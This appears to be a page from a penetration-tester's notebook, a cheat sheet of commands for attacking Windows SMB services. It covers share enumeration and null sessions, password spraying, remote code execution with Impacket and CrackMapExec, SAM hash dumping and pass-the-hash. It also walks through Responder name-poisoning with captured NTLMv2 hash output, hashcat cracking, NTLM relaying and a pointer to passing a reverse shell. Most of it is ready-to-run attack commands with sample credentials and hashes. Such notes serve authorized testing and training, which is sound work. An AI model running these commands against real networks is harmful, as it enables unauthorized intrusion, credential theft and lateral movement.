SMB (137,138,139,445)

OS Discovery using smb

nmap --script smb-os-discovery.nse -p445 10.10.10.40

Enumerate Hostnames

nmblookup -A $ip

List Shares

smbmap -H $ip
smbmap -H $ip -u alex -p lol123\!mD
smbclient -N -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip

Null Sessions

Using smbmap

smbmap -H $ip

Using rcpclient (port 139(?))

rpcclient -U "" -N $ip

Using smbclient

smbclient \\\\$ip\$sharename
smbclient \\\\$ip\$sharename -U username%password #authenticated

Using crackmapexec

crackmapexec smb 192.168.10.1 -u "" -p ""

Vuln Checking or use -sC for default scripts

nmap --script smb-vuln* -p 139,445 $ip

Scanning

Without username/password

enum4linux -a $ip

With username/password

enum4linux -u 'guest' -p '' -a $ip

Misconfigurations

Anonymous Authentication

Null session (refer above). Can use smbmap, smbclient, enum4linux, and rpcclient

Listing File Shares

$ smbclient -N -L //10.129.14.128
$ smbmap -H 10.129.14.128
$ smbmap -H 10.129.14.128 -r notes # -r (recursive) to browse directories

Downloading and Uploading Files

$ smbmap -H 10.129.14.128 --download "notes\note.txt"
$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

RPC Client (enumerate users)

$ rpcclient -U'%' 10.10.110.17

rpcclient $> enumdomusers

user:[mhope] rid:[0x641]

Protocol Specific Attacks

Password Bruteforce and Spray Attacks

$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

--continue-on-success to continue even after successful attempt

--local-auth if targeting a non domain joined computer

Remote Code Execution

  • Impacket PsExec - Python PsExec like functionality example using RemComSvc.

  • Impacket SMBExec - A similar approach to PsExec without using RemComSvc. This is useful when the target machine does NOT have a writeable share available.

  • Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

  • CrackMapExec - includes an implementation of smbexec and atexec.

  • Metasploit PsExec - Ruby PsExec implementation.

Impacket PsExec, SMBSexec, and atexec

$ impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

-x for commands and -X for powershell commands

uses --exec-method atexec by default

Extract Hashes from SAM database

$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Enumerating Logged on Users

$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Pass the Hash

$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Authentication Attacks (Responder)

Setup a fake SMB server to capture the NetNTLM v1/v2 hash

When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host's IP address by its hostname.

  • The hostname file share's IP address is required.

  • The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.

  • If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.

  • Is there no local DNS record? A query will be sent to the DNS server that has been configured.

  • If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.

$ sudo responder -I eth0

                                         __               
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|              

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0
               
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
<SNIP>
[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:XXXXXX

Cracking the NTLM Hash

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

If can't crack the password, relay it impacket-ntlmrelayx or MultiRelay.py

$ cat /etc/responder/Responder.conf | grep 'SMB = Off'
$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 # will dump SAM database

use -c to pass commands like a powershell reverse shell from https://www.revshells.com/

For RPC

  • Change a user's password.

  • Create a new domain user.

  • Create a new shared folder.

PreviousXXENextInteracting with SMB

Last updated